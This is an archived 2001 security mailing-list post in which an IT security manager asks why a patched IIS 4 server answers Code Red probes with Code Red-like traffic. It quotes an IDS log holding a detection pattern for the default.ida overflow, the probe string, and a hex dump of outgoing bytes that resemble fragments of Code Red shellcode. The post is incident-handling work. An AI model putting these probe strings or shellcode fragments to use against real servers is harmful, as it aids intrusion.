Appeal for Help. NOT Code Red But Is It?

From: Lindley, Patrick@HHSDC (Patrick@HHSDC)
Date: Mon Aug 13 2001 - 13:41:49 PDT

Next message: Blake McNeill: "Re: Do you know any Day 0 hacks use port 139? (fwd)"

Previous message: Garreth Jeremiah/Markham/IBM: "MSIIS servers patched/de-doored, but C and D keep coming back"
Next in thread: Bryan Andersen: "Re: Appeal for Help. NOT Code Red But Is It?"
Reply: Bryan Andersen: "Re: Appeal for Help. NOT Code Red But Is It?"
Reply: Ryan Russell: "Re: Appeal for Help. NOT Code Red But Is It?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Anybody know of a similar problem? Is this Code Red or something else? Does
anybody know WHY this would happen?

For the past 13 days we have been experiencing an unusual occurrence.  Every
time a particular patched NT 4.0 server of ours running IIS 4 is probed by a
Code Red infected system, our server immediately responds back to the prober
by attempting to exploit the vulnerability on that system.

Example:  158.42.25.98 sends the "/default.ida?" string followed by the "X"
or "N" string (depending on the Code Red version) and our system immediately
sends back the corresponding hack such as the HTML used in Code Red (Hacked
By Chinese!) or attempts to execute or drop D:EXPLORER.EXE on the attacking
system.

Our IDS logs and HTTP logs confirm these events. Our system in question does
not react as if it is infected with Code Red (i.e. continuously probing
other IP addresses) and as a matter of fact we have confirmed the MS patch
installation, run Trend Micro Systems anti-virus software on it, rebooted
it, and manually scanned for the tell-tale signs of Code Red infection.  It
only sends out this Code Red-like activity when it is probed.

I've included a copy of one entry from our IDS below.  Inbound port was 80
and outbound port was 2913. Context incoming is the data that was sent to us
(for instance from 158.42.25.98) and context outgoing is what our server
sent back.

           Ports: 80 -> 2913
   Context Match: [/]default[.]ida[?][a-zA-Z0-9]+%u
Context Incoming:
://***.***.***.***/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX%u

Context Outgoing:
\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\
FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\F
C\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC
\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\00\00\00\
00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00^\BF\B9\05\00\00j\07\E8
\10\00\00\00d:

explorer.exe\00\8B\04
$\88\18\FFU\CC\83\F8\FFtM\89\85L\FE\FF\FF\AC\8A\F88>u'j
\E8#\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00
\00\00\00\00\00\00\00\00\00\00\00j\01V\FF\B5L\FE\FF\FF\FFU\C8FOu\C5\FF\B5L\F
E\FF\FF\FFU\C4\FE\C3\80\FBd\0F\86L\F9\FF\FF\C3a\C9\C2\04\00\0

===========================
J. Patrick Lindley
Assistant IT Security Manager
Planning & Consulting Division
1651 Alhambra Blvd.
Sacramento, CA 95816
916-739-7976


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Blake McNeill: "Re: Do you know any Day 0 hacks use port 139? (fwd)"
Previous message: Garreth Jeremiah/Markham/IBM: "MSIIS servers patched/de-doored, but C and D keep coming back"
Next in thread: Bryan Andersen: "Re: Appeal for Help. NOT Code Red But Is It?"
Reply: Bryan Andersen: "Re: Appeal for Help. NOT Code Red But Is It?"
Reply: Ryan Russell: "Re: Appeal for Help. NOT Code Red But Is It?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Aug 13 2001 - 15:10:08 PDT